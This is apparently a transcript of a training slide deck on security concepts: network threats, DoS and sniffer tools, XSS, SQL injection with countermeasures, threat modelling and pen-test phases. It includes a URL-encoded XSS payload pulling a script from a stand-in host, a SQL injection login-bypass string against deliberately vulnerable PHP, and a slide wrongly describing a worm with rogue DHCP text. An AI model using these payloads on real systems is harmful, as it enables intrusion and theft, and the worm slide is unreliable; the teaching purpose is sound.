security concepts
TRANSCRIPT
• According to the Internet Storm Center (http://isc.sans.org), a computer connected to the Internet has an average of 5 minutes before it falls under some form of attack.
AGENDA:
1. Network Security
2. Threats and Vulnerability
3. Application, Data and Host Security
4. Security Threat Modelling
5. Penetration Testing
NETWORK SECURITY PRINCIPLE
• Confidentiality: only sender, intended receiver should “understand” message contents
o sender encrypts message
o receiver decrypts message
• Authentication: sender, receiver want to confirm identity of each other
• Message Integrity: sender, receiver want to ensure message not altered (in transit, or afterwards) without detection
• Access and Availability: services must be accessible and available to users
FRIENDS AND ENEMIES: ALICE, BOB, TRUDY
• well-known in network security world
• Bob, Alice (lovers!) want to communicate “securely”
• Trudy (intruder) may intercept, delete, add messages
securesender
securereceiver
channel data, control
messages
data data
Alice Bob
Trudy
data
8-
10
Who might Bob, Alice be?
• … well, real-life Bobs and Alices!
• Web browser/server for electronic transactions (e.g., on-line purchases)
• on-line banking client/server
• DNS servers
• routers exchanging routing table updates
• other examples?
APPLICATION LAYER ATTACK – LAYER 7
• HTTP: Virus, Worms, SQL Injection, XSS
• Malware: Trojans, Backdoors
SNIFFER ATTACK
• Wireshark
• CAIN and Abel
• TCPdump
• Kismet
• Dsniff
• etthercap
• Paros Proxy, Burp proxy
DOS ATTACK TOOLS• Jolt2
• Bubonic.c
• Land and LaTierra
• Targa
• Blast20
• Nemesy
• Panther2
• Crazy Pinger
• Some Trouble
• UDP Flood
• FSM
• FSMax
REFLECTION DOSThe attacking machines send out huge volumes of SYN packets
but with the IP source address pointing to the target machine.
MANGLE – INVALID PACKET ATTACK
Tools to simulate Invalid Packet attack
• Nmap
• Nessus
Tools to handle this
• Iptables(linux)
• Checkpoint
• Netfilter
• Application need to handle this
BOTNET
• Exploit the system and make it botclient->Make botnet server aware it has joined botnet->Install Anti-
anti virus module->Listen to botnet server for instruction
BUFFER OVERFLOWA flaw that occurs when more data is written to a block of memory, or buffer, than the buffer is allocated to hold.
ROGUE DHCP SERVER
• Malicious software in the network
• A type of Man in middle attack
• Installed using rootkit
• Will spoof data, make network slow and create network problems
EAVESDROPPING
• Eavesdropping is secretly listening to the private conversation of others without their consent, as defined
by Black's Law Dictionary.
• Unencrypted open wifi network
• Tool: Firesheep
SOCIAL ENGINEERING ATTACK• Phishing is a technique of fraudulently obtaining private
information. Typically, the phisher sends an e-mail that appears to come from a legitimate business—a bank, or credit card company—requesting "verification" of information and warning of some dire consequences if it is not provided.
• Phone phishing uses a rogue IVR system to recreate a legitimate-sounding copy of a bank or other institution's IVR system.
• Baiting is like the real-world Trojan Horse that uses physical media and relies on the curiosity or greed of the victim.
• Shoulder surfing involves observing an employee's private information over their shoulder. This type of attack is common in public places such as airports, airplanes or coffee shops.
WORM
• Malicious software in the network
• A type of Man in middle attack
• Installed using rootkit
• Will spoof data, make network slow and create network problems
ROOTKIT
A rootkit is a stealthy type of software, typically malicious, designed
to hide the existence of certain processes or programs from normal
methods of detection and enable continued privileged access to a
computer.
MAC FLOODING - ARP
In a typical MAC flooding attack, a switch is fed many Ethernet frames, each containing different
source MAC addresses, by the attacker. The
intention is to consume the limited memory set
aside in the switch to store the MAC address table.
Tool: dsniff
DNS CACHE POISONING
DNS spoofing (or DNS cache poisoning) is a computer hacking attack, whereby data is introduced into a Domain
Name System (DNS) resolver's cache, causing the name
server to return an incorrect IP address, diverting traffic to the
attacker's computer (or any other computer).
URL ENCODING OR CANONICALIZATIONCanonicalization is when a resource can be represented in more
than one manner.
Canonicalization of URLs occurs in a similar manner where
http://doman.tld/user/foo.gif and
http://domain.tld/user/bar/../foo.gif would represent the same image file
Results in XSS and SQL Injection attack.
Cross-Site Scripting
Excerpt from an arbitrary web page - “getdata.php”: echo $HTTP_GET_VARS[“data”];
URL-Encoded attack: http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2f
www.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e
HTML execution: <script src=”http://www.badplace.com/nasty.js”></script>
cheat sheet
MIME HEADER PARSING• Several Win32 mass mailers send themselves via an email with
a MIME encoded malicious executable with a malformed
header, and the executable will silently execute unbeknownst
to the user.
• This occurs whenever Internet Explorer parses the mail and thus can happen when simply reading or previewing email.
Thus, email worms can spread themselves without any user
actually executing or detaching a file.
http://www.kb.cert.org/vuls/id/980499
REPLAY ATTACK
• A replay attack (also known as playback attack) is a form of network
attack in which a valid data transmission is maliciously or fraudulently
repeated or delayed.
KEYLOGGER
• Keystroke logging, often referred to as keylogging or keyboard
capturing, is the action of recording (or logging) the keys struck on a
keyboard
• There are numerous keylogging methods, ranging from hardware
and software-based.
TOP 10 VULNERABILITY SCANNER TOOLS
1. Nessus
2. openVAS
3. Core Impact
4. Nexpose
5. GFI Languard
6. Qualysguard
7. MBSA
8. Retina
9. Secunia
10. SAINT
VULNERABILITY RESEARCH WEBSITES
• http://www.kb.cert.org/vuls
• www.securitytracker.com
• www.microsoft.com/security
• www.securiteam.com
• www.packetstormsecurity.com
• www.hackerstorm.com
• www.hackerwatch.org
• www.securityfocus.com
• www.securitymagazine.com
VULNERABILITY SEARCH
• https://web.nvd.nist.gov/view/vuln/search
SOFTWARE EXPLOITATION
• Database
• Spyware – Join MS spynet using Windows
defender
• Rootkits -
http://www.liutilities.com/products/wintasks
pro/processlibrary.
ATTACK
• Access attack – Dumpster diving,
Eavesdropping, Snooping, Interception
• Modification and Repudiation attack
• DOS attack – ping of death, buffer overflow
• Botnets - http://www.microsoft.com/security/sir
COMMON ATTACKS
• Backdoor
• Spoofing
• Phishing
• Man-In-Middle attack
• Replay attack
• Password guessing
• Privilege escalation
APPLICATION AND DATA SECURITY
• Web Application
• OWASP Top 10 -
https://www.owasp.org/index.php/OWASP_Top_Ten_Che
at_Sheet
• Hacking Tools: Instant Source, Wget,WebSleuth
BlackWidow,WindowBomb,Burp,cURL
SQL – TABLE NAME USERSName Age Email Password City
Ram 35 [email protected]
m
ram@123 Bangalore
Krishna 24 Krishna@nec.
com
098kkk Mysore
Parul 20 parul@gmail.
com
Pp234 chennai
Select age from users where name=‘Parul’;
Update users set email=‘[email protected]’ where name=Ram;-- This is comment
INSERT into users values (‘Puja’, 30, ‘[email protected]’,’ppp123’,’Ooty’);
DROP TABLE users;
e.g PHP code
$result = mysql_query(“select * from users where(name=‘$user’ and password=‘$pass’);”);
Add username as Bina’ OR 1=1);--
$result = mysql_query(“select * from users where(name=‘Bina’ OR 1=1);-- and password=‘junkvalue’);”);
SQL INJECTION COUNTERMEASURES
• Input validation
– Check it is in valid format - whitelisting
– Input Sanitization
Blacklisting-avoid ‘ ; --
Escaping problematic chars
Use Prepared statements
$db=new mysql(“localhost”,”Sita”,”ssttpass”,”DB”);
$statement=$db->prepare(“select * from users
where(name=? And password=?);”);
$statement->bind_param(“ss”,$user, $pass);
$statement->execute();
XSS
• Stored XSS
– Bad website->send malicious script to genuine web
server
– Client access genuine web server
– Run malicious script and sends data to attacker
• Reflected XSS attack
• Echoed input
• Prevention: Input validation
IMPORTANT KEYWORDS
• Threat Model
• Asset
• Threat
• Attack
• Attacker
• Impact
• Probability
• Mitigation
• Subject
IMPORTANT KEYWORDS CONTD…
• Object
• Action
• Intended Action
• Unintended Action
• Trust Boundary
• Subject/Object Matrix
• Actor/Action Matrix
• Data Flow Diagram
• Attack Tree
• IT Audit
THREAT MODELING
• Formal method to identify and enumerate risk
• Make informed risk decisions in regards to
– Actions
– Threats
– Mitigation against risk
WHAT CAN BE THREAT MODELED?
• Applications/ Software
• Systems
• Policies and Procedure
• Business Processes
• Anything….
WHEN TO DO THREAT MODELING
• Should be part of SDL
• Should be Iterative Process
• Whenever changes are made
RISK MANAGEMENT
• Risk Identification – incidents, bug reports,
testing
• Risk Enumeration & Classification – impact,
how and when it can occur, nature of risk
• Mitigation identification – cost benefit analysis
• Mitigation testing – Penetration testing, Third
party design review, procedural review and
management signoff, Legal review
THREAT MODEL PROCESS OVERVIEW
• Define Use Scenarios
• Define Security Assumptions
• Create/Update data flow diagram
• System Decomposition
• Identify Threats
• Determine Risks
• Plan Mitigations
• Iterate Threat Model
THREAT MODEL PROCESS METHODOLOGIES
• Microsoft STRIDE/DREAD
• NSA’s InfoSec Assessment Methodlogy
• CERT’s Octave
STRIDE
• Spoofing
• Tempering
• Repudiation
• Information Disclosure
• Denial of Service
• Escalation of Privilege
IAM
• Designed by NSA
• Used by US Federal Government
• Assessment broken into 10 different areas
• Designed to assess the risk of automated
information systems that support infra
• Highly detailed and rigid process
http://csrc.nist.gov/publications/PubsSPs.html#800-30
http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf
OCTAVE
• Originates from Carnegie Mellon University’s
S/W engg institute in collaboration with CERT
• Focusses on Org risk not technical
• OCTAVE for large org and OCTAVE-S for small
org.
http://www.cert.org/octave/
MS THREAT MODELING TOOL
• Based on CIA methodology
• Comprehensive attack library
• Contain helpful advanced features
http://www.microsoft.com/en-in/download/confirmation.aspx?id=42518
http://msdn.microsoft.com/en-us/library/ff649779.aspx
THREE PRE TEST PHASES
• Footprinting:
– Whois(internic.net), Smartwhois, nslookup
– Check company webpage, contact, location, numbers,
www.archive.org, whatismyip.com
– Employee blogs, Job boards
• Scanning
– Identifying active systems
– Discover open ports and access points
– Fingerprinting the OS
– Uncovering services on ports
Tools-> nmap, ping, traceroute, netcat
THREE PRE TEST PHASES CONTD….
• Enumerating
– Identify user accounts
– discover NetBIOS name with Nbtscan
– SNMPutil for SNMP
– Windows DNS query
– Establishing Null session
Tools->
Vulnerability Scanner: Retina, SAINT
Password Crackers: Brutus
IMPORTANT URLS
• Privilege Escalation: http://blog.spiderlabs.com/2012/12/my-5-top-ways-to-
escalate-privileges.html
• Sniffer Tools : http://sectools.org/tag/sniffers/
DEFENDING REPUTATION ON INTERNET
• http://www.defendmyname.com
• http://www.reputationdefender.com
• http://www.visibletechnologies.com
a %61 backspace %08 : %3A
b %62 tab %09 ; %3B
c %63 linefeed %0A < %3C
d %64 creturn %0D = %3D
e %65 space %20 > %3E
f %66 ! %21 ? %3F
g %67 " %22 @ %40
h %68 # %23 A %41
i %69 $ %24 B %42
j %6A % %25 C %43
k %6B & %26 D %44
l %6C ' %27 E %45
m %6D ( %28 F %46
n %6E ) %29 G %47
o %6F * %2A H %48
p %70 + %2B I %49
q %71 , %2C J %4A
r %72 - %2D K %4B
s %73 . %2E L %4C
t %74 / %2F M %4D
u %75 0 %30 N %4E
v %76 1 %31 O %4F
w %77 2 %32 P %50
x %78 3 %33 Q %51
y %79 4 %34 R %52
z %7A 5 %35 S %53
{ %7B 6 %36 T %54
| %7C 7 %37 U %55
} %7D 8 %38 V %56
~ %7E 9 %39 W %57
X %58
Y %59
Z %5A
[ %5B
\ %5C
] %5D
^ %5E
_ %5F
` %60